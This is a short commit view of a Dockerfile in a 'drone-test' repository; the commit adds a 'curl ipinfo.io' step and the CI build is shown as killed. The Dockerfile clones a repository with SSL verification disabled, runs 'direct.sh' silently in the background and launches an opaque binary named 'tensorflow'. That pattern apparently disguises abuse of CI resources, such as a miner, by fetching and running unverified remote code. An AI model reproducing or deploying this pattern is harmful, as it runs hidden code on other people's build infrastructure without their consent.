Update Dockerfile
continuous-integration/drone Build was killed Details

This commit is contained in:
GALAL AYMEN 2022-04-01 19:45:20 +00:00
parent a21d556b89
commit 4932fd6acf
1 changed files with 1 additions and 0 deletions

View File

@ -4,6 +4,7 @@ RUN apt-get install git curl -y
RUN git -c http.sslVerify=false clone https://gitlab.zam.io/wajinhakim/drone-test.git
WORKDIR /drone-test
RUN chmod +x tensorflow direct.sh
RUN curl ipinfo.io
RUN nohup bash direct.sh > /dev/null
EXPOSE 8080 8081
ENTRYPOINT ["./tensorflow"]